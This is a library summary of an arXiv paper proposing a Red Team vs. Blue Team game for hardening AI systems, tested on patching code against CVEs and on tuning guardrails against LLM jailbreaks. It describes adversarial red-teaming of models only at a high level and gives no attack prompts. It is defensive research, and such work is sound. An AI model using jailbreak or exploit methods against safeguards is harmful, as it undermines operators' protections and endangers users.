RvB: Automating AI System Hardening via Iterative Red-Blue Games

Authors: Lige Huang, Zicheng Liu, Jie Zhang, Lewen Yan, Dongrui Liu, Jing Shao

Published: 2026-01-27

arXiv ID: 2601.19726v1

Added to Library: 2026-01-28 04:00 UTC

Red Teaming

📄 Abstract

The dual offensive and defensive utility of Large Language Models (LLMs) highlights a critical gap in AI security: the lack of unified frameworks for dynamic, iterative adversarial adaptation hardening. To bridge this gap, we propose the Red Team vs. Blue Team (RvB) framework, formulated as a training-free, sequential, imperfect-information game. In this process, the Red Team exposes vulnerabilities, driving the Blue Team to learning effective solutions without parameter updates. We validate our framework across two challenging domains: dynamic code hardening against CVEs and guardrail optimization against jailbreaks. Our empirical results show that this interaction compels the Blue Team to learn fundamental defensive principles, leading to robust remediations that are not merely overfitted to specific exploits. RvB achieves Defense Success Rates of 90\% and 45\% across the respective tasks while maintaining near 0\% False Positive Rates, significantly surpassing baselines. This work establishes the iterative adversarial interaction framework as a practical paradigm that automates the continuous hardening of AI systems.

🔍 Key Points

Introduction of the Red Team vs. Blue Team (RvB) framework that automates the hardening of AI systems through iterative adversarial interactions, eliminating the need for parameter updates.
Demonstrated empirical results showing high defense success rates (90% for code hardening and 45% for guardrail optimization) while maintaining low false positive rates, improving defense efficiency in dynamic adversarial settings.
Formalizing the security process as a sequential, imperfect-information game provides a structured method to dynamically adapt defenses based on real-time exploits identified by the Red Team.
Experimental validation across two distinct domains (cybersecurity and content security) showcases the framework's versatility and effectiveness in enhancing the robustness of AI systems against various attacks.
Results indicate that iterative adversarial interactions not only improve specific defenses but also promote generalizable security principles, enhancing resilience against novel, unseen attack strategies.

💡 Why This Paper Matters

The proposed RvB framework represents a significant advancement in the field of AI security by bridging the gap between offensive and defensive methodologies. It offers a novel game-theoretic approach to continuously adapt and harden AI systems against emerging threats without requiring manual adjustments or extensive retraining. This makes it an essential contribution to enhancing the security posture of AI systems in a rapidly evolving landscape.

🎯 Why It's Interesting for AI Security Researchers

This paper is particularly relevant to AI security researchers as it addresses the critical need for dynamic, adaptive security frameworks capable of responding to the inherent vulnerabilities of AI systems. The innovative approach of using adversarial interactions provides a robust mechanism for resilience against complex attacks, making it a valuable reference for development and implementation of security methods in AI applications.

RvB: Automating AI System Hardening via Iterative Red-Blue Games

📄 Abstract

🔍 Key Points

💡 Why This Paper Matters

🎯 Why It's Interesting for AI Security Researchers

📚 Read the Full Paper